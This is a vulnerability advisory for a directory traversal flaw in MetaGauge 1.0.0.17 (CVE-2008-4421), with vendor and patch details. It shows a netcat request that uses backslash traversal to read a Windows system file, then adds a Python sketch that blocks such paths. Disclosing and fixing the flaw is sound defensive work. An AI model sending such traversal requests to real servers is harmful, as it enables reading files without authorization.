
MetaGauge 1.0.0.17 Directory Traversal



Title: MetaGauge 1.0.0.17 Directory Traversal

-------------------------------------------------------------

Vendor: Hammer Software

Vendor URL: www.Hammer-Software.com

Vendor Response: Vendor has been notified and has since addressed the issue in the latest software release.

Description:

A directory traversal vulnerability exists in MetaGauge version 1.0.0.17 (and potentially earlier versions) that allows a remote user to read files on the target server's local file system.

Example:

C:\> nc targethost 2004
GET /..\..\..\..\..\..\winnt\win.ini HTTP/1.1


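The request in the Example uses backslash separators, so a check that only looks for `../` never matches it. The sketch below is an added example, not MetaGauge's or the advisory author's code: it resolves a request-target with Windows path rules and refuses anything that lands outside the document root. `DOC_ROOT`, the function names and the benign sample path are assumptions.

```python
import ntpath
from urllib.parse import unquote

# Assumed document root; the advisory does not say where MetaGauge serves from.
DOC_ROOT = r"C:\MetaGauge\www"


def naive_is_safe(target: str) -> bool:
    """Hypothetical weak filter: only looks for forward-slash traversal."""
    return "../" not in target


def resolve_under_root(target: str, doc_root: str = DOC_ROOT):
    """Map an HTTP request-target to a file path, or return None if it would
    leave doc_root. ntpath applies Windows path rules on any host OS."""
    path = unquote(target.split("?", 1)[0])     # drop query, decode %xx once
    if "\x00" in path or ":" in path:           # NUL, drive letters, ADS names
        return None
    rel = path.replace("/", "\\").lstrip("\\")  # treat both separators alike
    root = ntpath.normpath(doc_root)
    candidate = ntpath.normpath(ntpath.join(root, rel))
    # Compare case-insensitively and require a separator after the root, so
    # C:\MetaGauge\www-old is not accepted as inside C:\MetaGauge\www.
    c, r = ntpath.normcase(candidate), ntpath.normcase(root)
    if c != r and not c.startswith(r + "\\"):
        return None
    return candidate


def target_from_request_line(line: str) -> str:
    """Extract the request-target from 'METHOD target HTTP/x.y'."""
    _method, target, _version = line.strip().split(" ", 2)
    return target


if __name__ == "__main__":
    samples = [
        r"GET /..\..\..\..\..\..\winnt\win.ini HTTP/1.1",  # from the advisory
        "GET /gauges/cpu.html HTTP/1.1",                   # constructed, benign
    ]
    for line in samples:
        t = target_from_request_line(line)
        print(f"{t!r}: naive={naive_is_safe(t)} resolved={resolve_under_root(t)}")
```

The containment check runs on the normalized path after decoding, which is why it does not depend on which separator or encoding the client used.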
Patch Information:

Hammer has addressed the issue in the latest version of MetaGauge:

http://dl.hammer-software.com/metagauge.zip

CVE:  CVE-2008-4421

Credit:

Brad Antoniewicz

brad.antoniewicz@foundstone.com
